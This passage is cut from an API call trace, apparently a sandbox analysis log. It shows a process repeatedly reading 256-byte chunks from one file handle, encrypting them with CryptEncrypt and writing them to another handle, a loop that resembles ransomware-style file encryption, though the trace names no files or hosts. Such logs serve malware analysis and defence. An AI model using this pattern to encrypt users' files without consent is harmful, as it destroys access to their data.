lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.578] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.578] GetLastError () returned 0x0 [0144.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.578] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.578] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.578] GetLastError () returned 0x0 [0144.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.578] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.578] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.578] GetLastError () returned 0x0 [0144.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.578] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.578] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.578] GetLastError () returned 0x0 [0144.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.578] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.578] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.578] GetLastError () returned 0x0 [0144.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.579] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.579] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.579] GetLastError () returned 0x0 [0144.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.579] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.579] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.579] GetLastError () returned 0x0 [0144.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.579] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.579] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.579] GetLastError () returned 0x0 [0144.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.579] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.579] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.579] GetLastError () returned 0x0 [0144.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.579] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.579] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.579] GetLastError () returned 0x0 [0144.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.579] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.579] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.579] GetLastError () returned 0x0 [0144.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.579] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.580] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.580] GetLastError () returned 0x0 [0144.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.580] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.580] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.580] GetLastError () returned 0x0 [0144.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.580] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.580] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.580] GetLastError () returned 0x0 [0144.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.580] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.580] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.580] GetLastError () returned 0x0 [0144.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.580] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.580] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.580] GetLastError () returned 0x0 [0144.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.580] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.580] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.580] GetLastError () returned 0x0 [0144.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.580] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.580] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.580] GetLastError () returned 0x0 [0144.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.581] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.581] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.581] GetLastError () returned 0x0 [0144.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.581] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.581] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.581] GetLastError () returned 0x0 [0144.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.581] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.581] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.581] GetLastError () returned 0x0 [0144.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.581] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.581] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.581] GetLastError () returned 0x0 [0144.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.581] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.581] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.581] GetLastError () returned 0x0 [0144.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.581] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.581] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.581] GetLastError () returned 0x0 [0144.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.581] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.582] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.582] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.582] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.582] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.582] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.582] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.582] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.583] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 